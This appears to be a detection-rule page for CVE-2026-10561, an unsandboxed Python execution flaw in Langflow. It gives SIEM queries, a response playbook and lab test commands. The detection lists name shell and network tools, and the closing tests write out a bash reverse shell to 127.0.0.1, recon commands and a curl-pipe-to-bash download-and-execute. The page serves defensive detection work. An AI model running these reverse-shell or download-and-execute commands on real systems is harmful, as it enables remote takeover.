Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561)
Detects exploitation of CVE-2026-10561, a critical (CVSS 9.9) remote code execution and privilege escalation vulnerability in Langflow versions prior to 1.10.1. The PythonREPLComponent executes user-supplied Python code without a sandbox, allowing any authenticated user to run arbitrary code with the privileges of the Langflow process. This detection looks for the Langflow server process (uvicorn/python running langflow) spawning unexpected child processes (shells, interpreters, reconnaissance binaries, reverse-shell patterns) and for suspicious API activity against the flow build/run endpoints that carry PythonREPLComponent payloads.
Vulnerability Intelligence
Public PoCAffected Software
- Vendor
- pip
- Product
- langflow
- Versions
- < 1.10.1
Timeline
- Disclosed
- October 6, 2026
References & Proof of Concept
- PoChttps://github.com/advisories/GHSA-8qpj-27x8-pwpq
- https://github.com/langflow-ai/langflow/security/advisories/GHSA-8qpj-27x8-pwpq
- https://nvd.nist.gov/vuln/detail/CVE-2026-10561
- https://github.com/langflow-ai/langflow/pull/13700
- https://github.com/langflow-ai/langflow/commit/2754c84aad1306f463db1c3bbb3e8ffbe85da77d
- https://github.com/langflow-ai/langflow/releases/tag/v1.10.1
- https://www.ibm.com/support/pages/node/7277242
CVSS
What is CVE-2026-10561 Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561)?
Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561) (CVE-2026-10561) maps to the Execution and Privilege Escalation tactics — the adversary is trying to run malicious code in MITRE ATT&CK.
This page provides production-ready detection logic for Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561), covering the data sources and telemetry it touches: Microsoft Defender for Endpoint. The queries below are rated critical severity at high confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
- Tactic
- Execution Privilege Escalation
let langflowParents = dynamic(["python","python3","uvicorn","gunicorn","langflow"]);
let suspiciousChildren = dynamic(["sh","bash","zsh","dash","nc","ncat","netcat","curl","wget","whoami","id","uname","cmd.exe","powershell.exe","pwsh.exe"]);
DeviceProcessEvents
| where InitiatingProcessFileName has_any (langflowParents)
and (InitiatingProcessCommandLine has "langflow" or InitiatingProcessCommandLine has "uvicorn")
| where FileName has_any (suspiciousChildren)
| where ProcessCommandLine has_any ("-c","/dev/tcp","base64","socket","subprocess","os.system","exec(","reverse","bash -i")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, ReportId
| order by Timestamp desc Flags the Langflow Python server process spawning shells or recon/network binaries with command lines indicative of injected PythonREPLComponent code.
Data Sources
Required Tables
False Positives
- Legitimate Langflow custom components that intentionally shell out for data integration tasks
- Administrator debugging sessions launching shells from the Langflow service account
- Health-check or monitoring scripts spawned by the Langflow container entrypoint
Sigma rule & cross-platform mapping
The detection logic for Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561) (CVE-2026-10561) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: process_creation
product: windows Browse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2026-10561
References (7)
- https://github.com/langflow-ai/langflow/security/advisories/GHSA-8qpj-27x8-pwpq
- https://nvd.nist.gov/vuln/detail/CVE-2026-10561
- https://github.com/langflow-ai/langflow/pull/13700
- https://github.com/langflow-ai/langflow/commit/2754c84aad1306f463db1c3bbb3e8ffbe85da77d
- https://github.com/langflow-ai/langflow/releases/tag/v1.10.1
- https://www.ibm.com/support/pages/node/7277242
- https://github.com/advisories/GHSA-8qpj-27x8-pwpq
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Langflow PythonREPL reverse shell simulation
Expected signal: Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.
- Test 2Langflow PythonREPL recon command execution
Expected signal: python3 process spawning sh -c invoking whoami/id/uname.
- Test 3Langflow PythonREPL download-and-execute
Expected signal: python3 parent spawning bash/curl child with piped execution command line.
Response Playbook
Triage
- Confirm the Langflow version on the affected host (`pip show langflow`); versions < 1.10.1 are vulnerable to unsandboxed PythonREPLComponent execution.
- Correlate the alerting child process with the Langflow access logs to identify the authenticated user/API key that submitted the flow run or build request.
- Review the parent Langflow process command line and the spawned child command line to determine whether the execution is a known custom component or injected attacker code (reverse shell, recon, download-and-execute).
- Determine whether the spawned process achieved outbound network connectivity or wrote new executables/persistence artifacts.
Containment
- Isolate the affected Langflow host from the network to stop any active reverse shell or lateral movement.
- Revoke the API key / session token of the authenticated user that triggered the PythonREPLComponent execution and disable the account pending investigation.
- Upgrade Langflow to >= 1.10.1 (which removes unsandboxed PythonREPLComponent execution) or, as an interim measure, restrict/disable the Python REPL component and place the service behind strict network ACLs.
Evidence Collection
- Capture the full Langflow application logs, uvicorn/gunicorn access logs, and the flow JSON definitions submitted around the alert time.
- Preserve process execution telemetry (parent/child, command lines, hashes) and any files written by the spawned process.
- Snapshot the host or container filesystem and collect network connection logs for the Langflow service account.
Escalation Criteria
- ! Escalate to incident response if the spawned child established an outbound/reverse connection or executed credential-access or recon commands.
- ! Escalate if evidence shows privilege escalation beyond the Langflow service account or lateral movement to other hosts.
- ! Escalate if the triggering account is unexpected, shared, or shows signs of compromise (impossible travel, brute force precursors).
Investigation Guide
Forensic Artifacts
- >
Langflow/uvicorn access logs showing POST requests to flow build/run endpoints (e.g. /api/v1/build, /api/v1/run) around the alert time - >
Flow JSON definitions containing a PythonREPLComponent node with attacker code - >
Process execution records for children of the Langflow Python process, plus any files/persistence they created
Tuning Guidance
Enumerate legitimate custom Langflow components that intentionally spawn subprocesses and allowlist their specific command-line patterns and service-account context. Scope the detection to hosts/containers known to run Langflow to reduce noise, and tighten the suspicious-child list to the binaries never expected in your deployment.
Hunting Queries
Baseline and hunt for any shell/recon children of the Langflow server process across the fleet.
DeviceProcessEvents | where InitiatingProcessCommandLine has "langflow" | where FileName in~ ("sh","bash","nc","ncat","curl","wget","whoami","id") | summarize count() by DeviceName, FileName, ProcessCommandLine, bin(Timestamp, 1h) index=edr (parent_process=*langflow* OR parent_process=*uvicorn*) (process_name=sh OR process_name=bash OR process_name=nc OR process_name=curl OR process_name=whoami) | stats count by host, process_name, process Atomic Red Team Tests
Simulates injected PythonREPLComponent code that launches a bash reverse shell from the Langflow process context (lab only).
Command
python3 -c "import subprocess; subprocess.run(['bash','-c','bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'])" & Cleanup
pkill -f '/dev/tcp/127.0.0.1/4444' 2>/dev/null; true Expected Telemetry
Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.
Expected Detection
KQL/SPL/EQL rules match the python parent spawning bash with /dev/tcp pattern.
Simulates attacker running host reconnaissance via unsandboxed Python code.
Command
python3 -c "import os; os.system('whoami; id; uname -a')" Cleanup
echo 'no cleanup required' Expected Telemetry
python3 process spawning sh -c invoking whoami/id/uname.
Expected Detection
Rules match python parent spawning recon binaries via os.system.
Simulates injected code that downloads and runs a second-stage payload.
Command
python3 -c "import subprocess; subprocess.run(['bash','-c','curl -s http://127.0.0.1:8000/x.sh | bash'])" Cleanup
rm -f /tmp/x.sh 2>/dev/null; true Expected Telemetry
python3 parent spawning bash/curl child with piped execution command line.
Expected Detection
Rules match python parent spawning curl/bash with download-and-execute pattern.